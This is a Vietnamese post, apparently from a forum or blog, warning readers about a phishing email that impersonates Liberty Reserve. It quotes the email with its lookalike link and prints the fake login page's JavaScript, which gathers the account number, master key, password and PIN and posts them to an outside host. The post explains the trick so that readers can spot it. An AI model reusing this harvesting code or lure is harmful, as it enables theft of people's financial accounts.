Tương tự như chiêu lừa đảo với AlertPay, email lần này có tiêu đề "verify your liberty reserve information" và nội dung:
Vào thử trang này thì sẽ thấy giao điện của nó giống hệt như của LibertyReserve. Xem source trang này bạn sẽ thấy hàm của nút Next như sau:
Chính vì thế, nếu vô tình tưởng đây là link đến LibertyReserve, rồi nhấn vào và cung cấp thông tin tài khoản thì hậu quả khó lường.
Các bạn hãy cẩn thận và tránh xa nó nhé.
(Nguồn www.kiemtienvn.info)
Nhìn vào cái link ở trên là biết nó lừa đảo rồi, up4.in mới thật sự là domain của nó, còn libertyreserve.com phía trước chỉ là subdomain nhằm đánh lừa những người không quan sát cẩn thận.Dear member,
Please confirm account,
copied the following link
http://libertyreserve.com.up4.in/en_win/?id=4237
Please DO NOT reply to this e mail.
For information and support please use our contact form in the help
section of our web site.
Thank you.
Vào thử trang này thì sẽ thấy giao điện của nó giống hệt như của LibertyReserve. Xem source trang này bạn sẽ thấy hàm của nút Next như sau:
Code:
function bomb_func(){
document.getElementById('bombuser').value = 'Account Number:'+document.getElementById('AccountNumber').value+' - Master Key:'+document.getElementById('Master').value ;
document.getElementById('bombpass').value = 'Password:'+document.getElementById('Password').value+' - PIN:'+document.getElementById('PIN').value ;
document.getElementById('login_bomb').action='http://up7.in/page/allpage.php?bombid=4237';
document.getElementById('login_bomb').submit();
}
Chính vì thế, nếu vô tình tưởng đây là link đến LibertyReserve, rồi nhấn vào và cung cấp thông tin tài khoản thì hậu quả khó lường.
Các bạn hãy cẩn thận và tránh xa nó nhé.
(Nguồn www.kiemtienvn.info)